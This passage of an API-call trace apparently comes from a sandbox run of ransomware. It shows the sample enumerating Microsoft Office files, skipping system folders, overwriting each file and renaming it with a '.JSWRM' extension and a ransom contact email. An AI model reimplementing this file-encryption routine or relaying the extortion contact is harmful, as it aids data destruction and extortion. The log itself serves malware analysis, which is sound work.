lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.052] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.053] CloseHandle (hObject=0x238) returned 1 [0142.053] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABEL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\label.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABEL.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\label.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.054] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233cee41, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233cee41, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2341b2ec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48c6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LABEL.XML", cAlternateFileName="")) returned 1 [0142.054] lstrcmpiW (lpString1="LABEL.XML", lpString2=".") returned 1 [0142.054] lstrcmpiW (lpString1="LABEL.XML", lpString2="..") returned 1 [0142.054] lstrcmpiW (lpString1="LABEL.XML", lpString2="...") returned 1 [0142.054] lstrcmpiW (lpString1="LABEL.XML", lpString2="windows") returned -1 [0142.054] lstrcmpiW (lpString1="LABEL.XML", lpString2="recovery") returned -1 [0142.054] lstrcmpiW (lpString1="LABEL.XML", lpString2="perflogs") returned -1 [0142.054] lstrcmpiW (lpString1="LABEL.XML", lpString2="documents and settings") returned 1 [0142.054] lstrcmpiW (lpString1="LABEL.XML", lpString2="$RECYCLE.BIN") returned 1 [0142.054] lstrcmpiW (lpString1="LABEL.XML", lpString2="system volume information") returned -1 [0142.055] lstrcmpiW (lpString1="LABEL.XML", lpString2="msocache") returned -1 [0142.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0142.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL.XML", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LABEL.XML", lpUsedDefaultChar=0x0) returned 9 [0142.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0142.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL.XML", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LABEL.XML", lpUsedDefaultChar=0x0) returned 9 [0142.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABEL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\label.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.056] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18630) returned 1 [0142.056] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.056] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x48c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x48c0, lpOverlapped=0x0) returned 1 [0142.059] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.059] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x48c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x48c0, lpOverlapped=0x0) returned 1 [0142.059] CloseHandle (hObject=0x238) returned 1 [0142.059] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABEL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\label.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABEL.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\label.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.060] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2303b5cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2303b5cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2327797c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27842, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LABEL98.POC", cAlternateFileName="")) returned 1 [0142.060] lstrcmpiW (lpString1="LABEL98.POC", lpString2=".") returned 1 [0142.060] lstrcmpiW (lpString1="LABEL98.POC", lpString2="..") returned 1 [0142.060] lstrcmpiW (lpString1="LABEL98.POC", lpString2="...") returned 1 [0142.060] lstrcmpiW (lpString1="LABEL98.POC", lpString2="windows") returned -1 [0142.060] lstrcmpiW (lpString1="LABEL98.POC", lpString2="recovery") returned -1 [0142.060] lstrcmpiW (lpString1="LABEL98.POC", lpString2="perflogs") returned -1 [0142.060] lstrcmpiW (lpString1="LABEL98.POC", lpString2="documents and settings") returned 1 [0142.061] lstrcmpiW (lpString1="LABEL98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.061] lstrcmpiW (lpString1="LABEL98.POC", lpString2="system volume information") returned -1 [0142.061] lstrcmpiW (lpString1="LABEL98.POC", lpString2="msocache") returned -1 [0142.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL98.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LABEL98.POC", lpUsedDefaultChar=0x0) returned 11 [0142.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABEL98.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LABEL98.POC", lpUsedDefaultChar=0x0) returned 11 [0142.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABEL98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\label98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.062] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=161858) returned 1 [0142.062] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.062] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.074] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.074] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.074] CloseHandle (hObject=0x238) returned 1 [0142.074] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABEL98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\label98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABEL98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\label98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.075] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2303b5cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2303b5cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x230ade29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3464, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LABELHM.POC", cAlternateFileName="")) returned 1 [0142.075] lstrcmpiW (lpString1="LABELHM.POC", lpString2=".") returned 1 [0142.075] lstrcmpiW (lpString1="LABELHM.POC", lpString2="..") returned 1 [0142.075] lstrcmpiW (lpString1="LABELHM.POC", lpString2="...") returned 1 [0142.075] lstrcmpiW (lpString1="LABELHM.POC", lpString2="windows") returned -1 [0142.075] lstrcmpiW (lpString1="LABELHM.POC", lpString2="recovery") returned -1 [0142.076] lstrcmpiW (lpString1="LABELHM.POC", lpString2="perflogs") returned -1 [0142.076] lstrcmpiW (lpString1="LABELHM.POC", lpString2="documents and settings") returned 1 [0142.076] lstrcmpiW (lpString1="LABELHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.076] lstrcmpiW (lpString1="LABELHM.POC", lpString2="system volume information") returned -1 [0142.076] lstrcmpiW (lpString1="LABELHM.POC", lpString2="msocache") returned -1 [0142.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABELHM.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABELHM.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LABELHM.POC", lpUsedDefaultChar=0x0) returned 11 [0142.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABELHM.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LABELHM.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LABELHM.POC", lpUsedDefaultChar=0x0) returned 11 [0142.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABELHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\labelhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.080] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13412) returned 1 [0142.080] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.080] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3460, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3460, lpOverlapped=0x0) returned 1 [0142.082] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.082] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3460, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3460, lpOverlapped=0x0) returned 1 [0142.082] CloseHandle (hObject=0x238) returned 1 [0142.082] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABELHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\labelhm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LABELHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\labelhm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.083] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22ca7e1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22ca7e1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2303b5cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f89d, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LETTHEAD.DPV", cAlternateFileName="")) returned 1 [0142.083] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2=".") returned 1 [0142.083] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2="..") returned 1 [0142.083] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2="...") returned 1 [0142.083] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2="windows") returned -1 [0142.083] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2="recovery") returned -1 [0142.084] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2="perflogs") returned -1 [0142.084] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2="documents and settings") returned 1 [0142.084] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2="$RECYCLE.BIN") returned 1 [0142.084] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2="system volume information") returned -1 [0142.084] lstrcmpiW (lpString1="LETTHEAD.DPV", lpString2="msocache") returned -1 [0142.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LETTHEAD.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LETTHEAD.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LETTHEAD.DPV", lpUsedDefaultChar=0x0) returned 12 [0142.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LETTHEAD.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LETTHEAD.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LETTHEAD.DPV", lpUsedDefaultChar=0x0) returned 12 [0142.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LETTHEAD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\letthead.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.085] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=129181) returned 1 [0142.085] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.085] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1f890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1f890, lpOverlapped=0x0) returned 1 [0142.094] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.094] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1f890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1f890, lpOverlapped=0x0) returned 1 [0142.094] CloseHandle (hObject=0x238) returned 1 [0142.095] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LETTHEAD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\letthead.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LETTHEAD.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\letthead.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.096] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22ca7e1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22ca7e1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2327797c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x309e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LETTHEAD.XML", cAlternateFileName="")) returned 1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2=".") returned 1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2="..") returned 1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2="...") returned 1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2="windows") returned -1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2="recovery") returned -1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2="perflogs") returned -1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2="documents and settings") returned 1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2="$RECYCLE.BIN") returned 1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2="system volume information") returned -1 [0142.096] lstrcmpiW (lpString1="LETTHEAD.XML", lpString2="msocache") returned -1 [0142.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LETTHEAD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LETTHEAD.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LETTHEAD.XML", lpUsedDefaultChar=0x0) returned 12 [0142.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LETTHEAD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LETTHEAD.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LETTHEAD.XML", lpUsedDefaultChar=0x0) returned 12 [0142.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LETTHEAD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\letthead.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.097] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12446) returned 1 [0142.097] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.097] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3090, lpOverlapped=0x0) returned 1 [0142.099] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.099] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3090, lpOverlapped=0x0) returned 1 [0142.099] CloseHandle (hObject=0x238) returned 1 [0142.099] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LETTHEAD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\letthead.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LETTHEAD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\letthead.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.100] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x230153e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x230153e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2327797c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="LINEACT.POC", cAlternateFileName="")) returned 1 [0142.100] lstrcmpiW (lpString1="LINEACT.POC", lpString2=".") returned 1 [0142.101] lstrcmpiW (lpString1="LINEACT.POC", lpString2="..") returned 1 [0142.101] lstrcmpiW (lpString1="LINEACT.POC", lpString2="...") returned 1 [0142.101] lstrcmpiW (lpString1="LINEACT.POC", lpString2="windows") returned -1 [0142.101] lstrcmpiW (lpString1="LINEACT.POC", lpString2="recovery") returned -1 [0142.101] lstrcmpiW (lpString1="LINEACT.POC", lpString2="perflogs") returned -1 [0142.101] lstrcmpiW (lpString1="LINEACT.POC", lpString2="documents and settings") returned 1 [0142.101] lstrcmpiW (lpString1="LINEACT.POC", 